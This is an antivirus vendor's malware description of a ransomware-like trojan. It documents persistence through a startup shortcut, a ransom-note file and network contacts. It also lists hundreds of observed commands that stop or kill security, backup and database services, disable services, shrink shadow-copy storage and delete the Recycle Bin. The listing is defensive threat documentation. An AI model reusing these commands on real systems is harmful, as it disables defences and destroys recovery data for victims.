Trojan.DownLoader34.49176

Added to the Dr.Web virus database: 2020-09-20

Virus description added:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • %APPDATA%\microsoft\windows\start menu\programs\startup\mystartup.lnk
Malicious functions
To complicate detection of its presence in the operating system,
deletes volume shadow copies.
Executes the following
  • '<SYSTEM32>\net.exe' stop avpsus /y
  • '<SYSTEM32>\net.exe' stop mfemms /y
  • '<SYSTEM32>\net.exe' stop RESvc /y
  • '<SYSTEM32>\net.exe' stop mfevtp /y
  • '<SYSTEM32>\net.exe' stop sms_site_sql_backup /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$BKUPEXEC /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SOPHOS /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$CITRIX_METAFRAME /y
  • '<SYSTEM32>\net.exe' stop sacsvr /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$CXDB /y
  • '<SYSTEM32>\net.exe' stop SAVAdminService /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$ECWDB2 /y
  • '<SYSTEM32>\net.exe' stop SAVService /y
  • '<SYSTEM32>\net.exe' stop svcGenericHost /y
  • '<SYSTEM32>\net.exe' stop wbengine /y
  • '<SYSTEM32>\net.exe' stop mfefire /y
  • '<SYSTEM32>\net.exe' stop ShMonitor /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PROD /y
  • '<SYSTEM32>\net.exe' stop Smcinst /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net.exe' stop SmcService /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SBSMONITORING /y
  • '<SYSTEM32>\net.exe' stop SntpService /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SHAREPOINT /y
  • '<SYSTEM32>\net.exe' stop sophossps /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SOPHOS /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SQLEXPRESS /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PRACTTICEBGC /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$PRACTTICEMGT /y
  • '<SYSTEM32>\net.exe' stop VeeamBackupSvc /y
  • '<SYSTEM32>\net.exe' stop SepMasterService /y
  • '<SYSTEM32>\net.exe' stop MSSQLSERVER /y
  • '<SYSTEM32>\net.exe' stop kavfsslp /y
  • '<SYSTEM32>\net.exe' stop VeeamBrokerSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop klnagent /y
  • '<SYSTEM32>\net.exe' stop VeeamCatalogSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop macmnsvc /y
  • '<SYSTEM32>\net.exe' stop VeeamCloudSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$TPS /y
  • '<SYSTEM32>\net.exe' stop masvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$TPSAMA /y
  • '<SYSTEM32>\net.exe' stop MBAMService /y
  • '<SYSTEM32>\net.exe' stop MySQL80 /y
  • '<SYSTEM32>\net.exe' stop OracleClientCache80 /y
  • '<SYSTEM32>\net.exe' stop McTaskManager /y
  • '<SYSTEM32>\net.exe' stop VeeamEnterpriseManagerSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLServerADHelper /y
  • '<SYSTEM32>\net.exe' stop McAfeeEngineService /y
  • '<SYSTEM32>\net.exe' stop VeeamHvIntegrationSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLServerADHelper100 /y
  • '<SYSTEM32>\net.exe' stop McAfeeFramework /y
  • '<SYSTEM32>\net.exe' stop VeeamMountSvc /y
  • '<SYSTEM32>\net.exe' stop MSSQLServerOLAPService /y
  • '<SYSTEM32>\net.exe' stop McAfeeFrameworkMcAfeeFramework /y
  • '<SYSTEM32>\net.exe' stop MySQL57 /y
  • '<SYSTEM32>\net.exe' stop McShield /y
  • '<SYSTEM32>\net.exe' stop VeeamRESTSvc /y
  • '<SYSTEM32>\net.exe' stop VeeamDeploySvc /y
  • '<SYSTEM32>\net.exe' stop MBEndpointAgent /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SHAREPOINT /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$TPSAMA /y
  • '<SYSTEM32>\taskkill.exe' /IM thebat64.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ocomm.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM infopath.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mbamtray.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM zoolz.exe /F
  • '<SYSTEM32>\taskkill.exe' IM thunderbird.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM dbsnmp.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM xfssvccon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM Ntrtscan.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM isqlplussvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM onenote.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM PccNTMon.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tbirdconfig.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM dbeng50.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msaccess.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM msftesql.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM powerpnt.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM visio.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM winword.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-nt.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM wordpad.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld-opt.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ocautoupds.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM ocssd.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM oracle.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlagent.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqlbrowser.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM outlook.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM tmlisten.exe /F
  • '<SYSTEM32>\net.exe' stop SQLAgent$TPS /y
  • '<SYSTEM32>\net.exe' stop swi_filter /y
  • '<SYSTEM32>\taskkill.exe' /IM excel.exe /F
  • '<SYSTEM32>\net.exe' stop swi_update /y
  • '<SYSTEM32>\net.exe' stop swi_update_64 /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$VEEAMSQL2012 /y
  • '<SYSTEM32>\net.exe' stop TmCCSF /y
  • '<SYSTEM32>\net.exe' stop SQLBrowser /y
  • '<SYSTEM32>\net.exe' stop tmlisten /y
  • '<SYSTEM32>\net.exe' stop SQLSafeOLRService /y
  • '<SYSTEM32>\net.exe' stop TrueKey /y
  • '<SYSTEM32>\net.exe' stop SQLSERVERAGENT /y
  • '<SYSTEM32>\net.exe' stop TrueKeyScheduler /y
  • '<SYSTEM32>\net.exe' stop SQLTELEMETRY /y
  • '<SYSTEM32>\taskkill.exe' /IM CNTAoSMgr.exe /F
  • '<SYSTEM32>\net.exe' stop swi_service /y
  • '<SYSTEM32>\taskkill.exe' /IM sqlwriter.exe /F
  • '<SYSTEM32>\net.exe' stop TrueKeyServiceHelper /y
  • '<SYSTEM32>\net.exe' stop vapiendpoint /y
  • '<SYSTEM32>\taskkill.exe' /IM mspub.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mydesktopqos.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mydesktopservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM mysqld.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM sqbcoreservice.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM firefoxconfig.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM agntsvc.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM thebat.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM steam.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM encsvc.exe /F
  • '<SYSTEM32>\net.exe' stop SQLTELEMETRY$ECWDB2 /y
  • '<SYSTEM32>\net.exe' stop WRSVC /y
  • '<SYSTEM32>\net.exe' stop mssql$vim_sqlexp /y
  • '<SYSTEM32>\net.exe' stop KAVFSGT /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$SBSMONITORING /y
  • '<SYSTEM32>\net.exe' stop SQLWriter /y
  • '<SYSTEM32>\net.exe' stop CAARCUpdateSvc /y
  • '<SYSTEM32>\net.exe' stop sophos /y
  • '<SYSTEM32>\net.exe' stop “Acronis VSS Provider” /y
  • '<SYSTEM32>\net.exe' stop MsDtsServer /y
  • '<SYSTEM32>\net.exe' stop IISAdmin /y
  • '<SYSTEM32>\net.exe' stop MSExchangeES /y
  • '<SYSTEM32>\net.exe' stop “Sophos Agent” /y
  • '<SYSTEM32>\net.exe' stop EraserSvc11710 /y
  • '<SYSTEM32>\net.exe' stop “Enterprise Client Service” /y
  • '<SYSTEM32>\net.exe' stop “SQL Backups /y
  • '<SYSTEM32>\net.exe' stop MsDtsServer100 /y
  • '<SYSTEM32>\net.exe' stop NetMsmqActivator /y
  • '<SYSTEM32>\net.exe' stop AcronisAgent /y
  • '<SYSTEM32>\net.exe' stop “Sophos Device Control Service” /y
  • '<SYSTEM32>\net.exe' stop AcrSch2Svc /y
  • '<SYSTEM32>\net.exe' stop ReportServer /y
  • '<SYSTEM32>\net.exe' stop “SQLsafe Backup Service” /y
  • '<SYSTEM32>\net.exe' stop MsDtsServer110 /y
  • '<SYSTEM32>\net.exe' stop POP3Svc /y
  • '<SYSTEM32>\net.exe' stop MSExchangeMGMT /y
  • '<SYSTEM32>\net.exe' stop “Sophos Clean Service” /y
  • '<SYSTEM32>\net.exe' stop SMTPSvc /y
  • '<SYSTEM32>\net.exe' stop ReportServer$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop “SQLsafe Filter Service” /y
  • '<SYSTEM32>\net.exe' stop msftesql$PROD /y
  • '<SYSTEM32>\net.exe' stop SstpSvc /y
  • '<SYSTEM32>\net.exe' stop MSExchangeMTA /y
  • '<SYSTEM32>\net.exe' stop “Sophos AutoUpdate Service” /y
  • '<SYSTEM32>\net.exe' stop MSExchangeIS /y
  • '<SYSTEM32>\net.exe' stop SamSs /y
  • '<SYSTEM32>\net.exe' stop BackupExecManagementService /y
  • '<SYSTEM32>\net.exe' stop zhudongfangyu /y
  • '<SYSTEM32>\net.exe' stop mfewc /y
  • '<SYSTEM32>\net.exe' stop BMR Boot Service /y
  • '<SYSTEM32>\net.exe' stop NetBackup BMR MTFTP Service /y
  • '<SYSTEM32>\net.exe' stop DefWatch /y
  • '<SYSTEM32>\net.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net.exe' stop SavRoam /y
  • '<SYSTEM32>\net.exe' stop RTVscan /y
  • '<SYSTEM32>\net.exe' stop QBFCService /y
  • '<SYSTEM32>\net.exe' stop QBIDPService /y
  • '<SYSTEM32>\net.exe' stop Intuit.QuickBooks.FCS /y
  • '<SYSTEM32>\net.exe' stop QBCFMonitorService /y
  • '<SYSTEM32>\net.exe' stop BackupExecRPCService /y
  • '<SYSTEM32>\net.exe' stop ReportServer$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop McAfeeDLPAgentService /y
  • '<SYSTEM32>\net.exe' stop stc_raw_agent /y
  • '<SYSTEM32>\net.exe' stop VSNAPVSS /y
  • '<SYSTEM32>\net.exe' stop VeeamTransportSvc /y
  • '<SYSTEM32>\net.exe' stop VeeamDeploymentService /y
  • '<SYSTEM32>\net.exe' stop VeeamNFSSvc /y
  • '<SYSTEM32>\net.exe' stop veeam /y
  • '<SYSTEM32>\net.exe' stop PDVFSService /y
  • '<SYSTEM32>\net.exe' stop BackupExecVSSProvider /y
  • '<SYSTEM32>\net.exe' stop BackupExecAgentAccelerator /y
  • '<SYSTEM32>\net.exe' stop BackupExecAgentBrowser /y
  • '<SYSTEM32>\net.exe' stop BackupExecDiveciMediaService /y
  • '<SYSTEM32>\net.exe' stop BackupExecJobEngine /y
  • '<SYSTEM32>\net.exe' stop YooIT /y
  • '<SYSTEM32>\net.exe' stop YooBackup /y
  • '<SYSTEM32>\net.exe' stop CASAD2DWebSvc /y
  • '<SYSTEM32>\net.exe' stop “Symantec System Recovery” /y
  • '<SYSTEM32>\net.exe' stop Antivirus /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SBSMONITORING /y
  • '<SYSTEM32>\net.exe' stop AVP /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SHAREPOINT /y
  • '<SYSTEM32>\net.exe' stop DCAgent /y
  • '<SYSTEM32>\net.exe' stop bedbg /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop EhttpSrv /y
  • '<SYSTEM32>\net.exe' stop MMS /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SQLEXPRESS /y
  • '<SYSTEM32>\net.exe' stop ekrn /y
  • '<SYSTEM32>\net.exe' stop mozyprobackup /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net.exe' stop “Sophos Web Control Service” /y
  • '<SYSTEM32>\net.exe' stop MSSQL$SBSMONITORING /
  • '<SYSTEM32>\net.exe' stop MSSQL$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop EPUpdateService /y
  • '<SYSTEM32>\net.exe' stop ntrtscan /y
  • '<SYSTEM32>\net.exe' stop MSSQL$TPSAMA /y
  • '<SYSTEM32>\net.exe' stop EsgShKernel /y
  • '<SYSTEM32>\net.exe' stop ESHASRV /y
  • '<SYSTEM32>\net.exe' stop SDRSVC /y
  • '<SYSTEM32>\net.exe' stop MSSQL$VEEAMSQL2012 /y
  • '<SYSTEM32>\net.exe' stop FA_Scheduler /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net.exe' stop KAVFS /y
  • '<SYSTEM32>\net.exe' stop EPSecurityService /y
  • '<SYSTEM32>\net.exe' stop MSSQL$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net.exe' stop MSSQL$TPS /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PROD /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PRACTTICEBGC /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$SQL_2008 /y
  • '<SYSTEM32>\net.exe' stop MSExchangeSA /y
  • '<SYSTEM32>\net.exe' stop “Sophos File Scanner Service” /y
  • '<SYSTEM32>\net.exe' stop ReportServer$TPS /y
  • '<SYSTEM32>\net.exe' stop “Veeam Backup Catalog Data Service” /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$SYSTEM_BGC /y
  • '<SYSTEM32>\net.exe' stop W3Svc /y
  • '<SYSTEM32>\net.exe' stop MSExchangeSRS /y
  • '<SYSTEM32>\net.exe' stop “Sophos Health Service” /y
  • '<SYSTEM32>\net.exe' stop ReportServer$TPSAMA /y
  • '<SYSTEM32>\net.exe' stop “Zoolz 2 Service” /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$TPS /y
  • '<SYSTEM32>\net.exe' stop “aphidmonitorservice” /y
  • '<SYSTEM32>\net.exe' stop msexchangeadtopology /y
  • '<SYSTEM32>\net.exe' stop UI0Detect /y
  • '<SYSTEM32>\net.exe' stop “Sophos MCS Agent” /y
  • '<SYSTEM32>\net.exe' stop “intel(r) proset monitoring service” /y
  • '<SYSTEM32>\net.exe' stop msexchangeimap4 /y
  • '<SYSTEM32>\net.exe' stop “Sophos MCS Client” /y
  • '<SYSTEM32>\net.exe' stop ARSM /y
  • '<SYSTEM32>\net.exe' stop MSSQL$BKUPEXEC /y
  • '<SYSTEM32>\net.exe' stop unistoresvc_1af40a /y
  • '<SYSTEM32>\net.exe' stop “Sophos Message Router” /y
  • '<SYSTEM32>\net.exe' stop MSSQL$ECWDB2 /y
  • '<SYSTEM32>\net.exe' stop audioendpointbuilder /y
  • '<SYSTEM32>\net.exe' stop “Sophos Safestore Service” /y
  • '<SYSTEM32>\net.exe' stop MSSQL$PRACTICEMGT /y
  • '<SYSTEM32>\net.exe' stop “Sophos System Protection Service” /y
  • '<SYSTEM32>\net.exe' stop BackupExecDeviceMediaService /y
  • '<SYSTEM32>\net.exe' stop MSOLAP$TPSAMA /y
  • '<SYSTEM32>\taskkill.exe' /IM sqlservr.exe /F
  • '<SYSTEM32>\taskkill.exe' /IM synctime.exe /F
Modifies file system
Creates the following files
  • %TEMP%\nd1zco3q.exe
  • %TEMP%\how_to_decypher_files.txt
Network activity
TCP
  • 'google.com':443
  • 'ra#.####ubusercontent.com':443
UDP
  • DNS ASK ra#.####ubusercontent.com
  • DNS ASK google.com
Miscellaneous
Searches for the following windows
  • ClassName: 'TaskManagerWindow' WindowName: 'Administrador de tareas'
  • ClassName: '#32770' WindowName: 'Task Manager'
  • ClassName: '#32770' WindowName: ''
  • ClassName: 'SysListView32' WindowName: 'Processes'
  • ClassName: '' WindowName: ''
Executes the following
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
  • '<SYSTEM32>\net1.exe' stop VeeamHvIntegrationSvc /y
  • '<SYSTEM32>\net1.exe' stop MySQL80 /y
  • '<SYSTEM32>\net1.exe' stop VeeamRESTSvc /y
  • '<SYSTEM32>\net1.exe' stop McShield /y
  • '<SYSTEM32>\net1.exe' stop EhttpSrv /y
  • '<SYSTEM32>\net1.exe' stop MMS /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQLEXPRESS /y
  • '<SYSTEM32>\net1.exe' stop ekrn /y
  • '<SYSTEM32>\net1.exe' stop mozyprobackup /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop McAfeeFrameworkMcAfeeFramework /y
  • '<SYSTEM32>\net1.exe' stop VeeamNFSSvc /y
  • '<SYSTEM32>\net1.exe' stop MySQL57 /y
  • '<SYSTEM32>\net1.exe' stop DCAgent /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SHAREPOINT /y
  • '<SYSTEM32>\net1.exe' stop BackupExecVSSProvider /y
  • '<SYSTEM32>\net1.exe' stop AVP /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Web Control Service” /y
  • '<SYSTEM32>\net1.exe' stop BackupExecJobEngine /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PROD /y
  • '<SYSTEM32>\net1.exe' stop AcronisAgent /y
  • '<SYSTEM32>\net1.exe' stop BackupExecManagementService /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop bedbg /y
  • '<SYSTEM32>\net1.exe' stop MSSQLServerOLAPService /y
  • '<SYSTEM32>\net1.exe' stop McAfeeFramework /y
  • '<SYSTEM32>\net1.exe' stop BackupExecRPCService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SQLEXPRESS /y
  • '<SYSTEM32>\net1.exe' stop svcGenericHost /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop swi_filter /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$TPS /y
  • '<SYSTEM32>\net1.exe' stop swi_service /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop swi_update /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop sophossps /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SHAREPOINT /y
  • '<SYSTEM32>\net1.exe' stop SntpService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SBSMONITORING /y
  • '<SYSTEM32>\net1.exe' stop SmcService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PRACTTICEBGC /y
  • '<SYSTEM32>\net1.exe' stop SepMasterService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PRACTTICEMGT /y
  • '<SYSTEM32>\net1.exe' stop ShMonitor /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$PROD /y
  • '<SYSTEM32>\net1.exe' stop Smcinst /y
  • '<SYSTEM32>\net1.exe' stop NetBackup BMR MTFTP Service /y
  • '<SYSTEM32>\net1.exe' stop MSSQLServerADHelper100 /y
  • '<SYSTEM32>\net1.exe' stop Antivirus /y
  • '<SYSTEM32>\net1.exe' stop swi_update_64 /y
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SBSMONITORING /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SBSMONITORING /
  • '<SYSTEM32>\net1.exe' stop W3Svc /y
  • '<SYSTEM32>\net1.exe' stop MsDtsServer /y
  • '<SYSTEM32>\net1.exe' stop IISAdmin /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeES /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Agent” /y
  • '<SYSTEM32>\net1.exe' stop EraserSvc11710 /y
  • '<SYSTEM32>\net1.exe' stop wbengine /y
  • '<SYSTEM32>\net1.exe' stop AcrSch2Svc /y
  • '<SYSTEM32>\net1.exe' stop “Sophos File Scanner Service” /y
  • '<SYSTEM32>\net1.exe' stop “Acronis VSS Provider” /y
  • '<SYSTEM32>\net1.exe' stop sophos /y
  • '<SYSTEM32>\net1.exe' stop CAARCUpdateSvc /y
  • '<SYSTEM32>\net1.exe' stop CASAD2DWebSvc /y
  • '<SYSTEM32>\net1.exe' stop SAVAdminService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$CXDB /y
  • '<SYSTEM32>\net1.exe' stop sacsvr /y
  • '<SYSTEM32>\net1.exe' stop mfevtp /y
  • '<SYSTEM32>\net1.exe' stop sms_site_sql_backup /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$BKUPEXEC /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SOPHOS /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$CITRIX_METAFRAME /y
  • '<SYSTEM32>\net1.exe' stop RESvc /y
  • '<SYSTEM32>\net1.exe' stop mfemms /y
  • '<SYSTEM32>\net1.exe' stop BackupExecDiveciMediaService /y
  • '<SYSTEM32>\net1.exe' stop veeam /y
  • '<SYSTEM32>\net1.exe' stop msexchangeadtopology /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$VEEAMSQL2012 /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$SOPHOS /y
  • '<SYSTEM32>\net1.exe' stop “Sophos MCS Agent” /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PRACTTICEBGC /y
  • '<SYSTEM32>\net1.exe' stop BackupExecDeviceMediaService /y
  • '<SYSTEM32>\net1.exe' stop “Sophos System Protection Service” /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$PRACTICEMGT /y
  • '<SYSTEM32>\net1.exe' stop BackupExecAgentBrowser /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Safestore Service” /y
  • '<SYSTEM32>\net1.exe' stop audioendpointbuilder /y
  • '<SYSTEM32>\net1.exe' stop “intel(r) proset monitoring service” /y
  • '<SYSTEM32>\net1.exe' stop msexchangeimap4 /y
  • '<SYSTEM32>\net1.exe' stop “Sophos MCS Client” /y
  • '<SYSTEM32>\net1.exe' stop ARSM /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$BKUPEXEC /y
  • '<SYSTEM32>\net1.exe' stop unistoresvc_1af40a /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Message Router” /y
  • '<SYSTEM32>\net1.exe' stop BackupExecAgentAccelerator /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$ECWDB2 /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop mfefire /y
  • '<SYSTEM32>\net1.exe' stop SAVService /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$ECWDB2 /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeSRS /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Health Service” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop “Zoolz 2 Service” /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$TPS /y
  • '<SYSTEM32>\net1.exe' stop “Enterprise Client Service” /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$SBSMONITORING /y
  • '<SYSTEM32>\net1.exe' stop TmCCSF /y
  • '<SYSTEM32>\net1.exe' stop SQLBrowser /y
  • '<SYSTEM32>\net1.exe' stop mssql$vim_sqlexp /y
  • '<SYSTEM32>\net1.exe' stop RTVscan /y
  • '<SYSTEM32>\net1.exe' stop EsgShKernel /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop ntrtscan /y
  • '<SYSTEM32>\net1.exe' stop EPUpdateService /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$TPS /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net1.exe' stop EPSecurityService /y
  • '<SYSTEM32>\net1.exe' stop “Veeam Backup Catalog Data Service” /y
  • '<SYSTEM32>\net1.exe' stop McAfeeDLPAgentService /y
  • '<SYSTEM32>\net1.exe' stop mfewc /y
  • '<SYSTEM32>\net1.exe' stop PDVFSService /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop UI0Detect /y
  • '<SYSTEM32>\net1.exe' stop McTaskManager /y
  • '<SYSTEM32>\net1.exe' stop VeeamTransportSvc /y
  • '<SYSTEM32>\net1.exe' stop OracleClientCache80 /y
  • '<SYSTEM32>\net1.exe' stop SstpSvc /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeMTA /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Device Control Service” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop “Symantec System Recovery” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net1.exe' stop ReportServer$TPS /y
  • '<SYSTEM32>\net1.exe' stop SavRoam /y
  • '<SYSTEM32>\net1.exe' stop VSNAPVSS /y
  • '<SYSTEM32>\net1.exe' stop “SQLsafe Filter Service” /y
  • '<SYSTEM32>\net1.exe' stop avpsus /y
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY start= disabled
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLWriter start= disabled
  • '<SYSTEM32>\sc.exe' config SstpSvc start= disabled
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • '<SYSTEM32>\cmd.exe' /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • '<SYSTEM32>\net1.exe' stop MSExchangeSA /y
  • '<SYSTEM32>\net1.exe' stop QBFCService /y
  • '<SYSTEM32>\net1.exe' stop QBIDPService /y
  • '<SYSTEM32>\net1.exe' stop Intuit.QuickBooks.FCS /y
  • '<SYSTEM32>\net1.exe' stop QBCFMonitorService /y
  • '<SYSTEM32>\net1.exe' stop YooBackup /y
  • '<SYSTEM32>\net1.exe' stop YooIT /y
  • '<SYSTEM32>\net1.exe' stop zhudongfangyu /y
  • '<SYSTEM32>\vssadmin.exe' resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • '<SYSTEM32>\net1.exe' stop DefWatch /y
  • '<SYSTEM32>\net1.exe' stop “aphidmonitorservice” /y
  • '<SYSTEM32>\net1.exe' stop msftesql$PROD /y
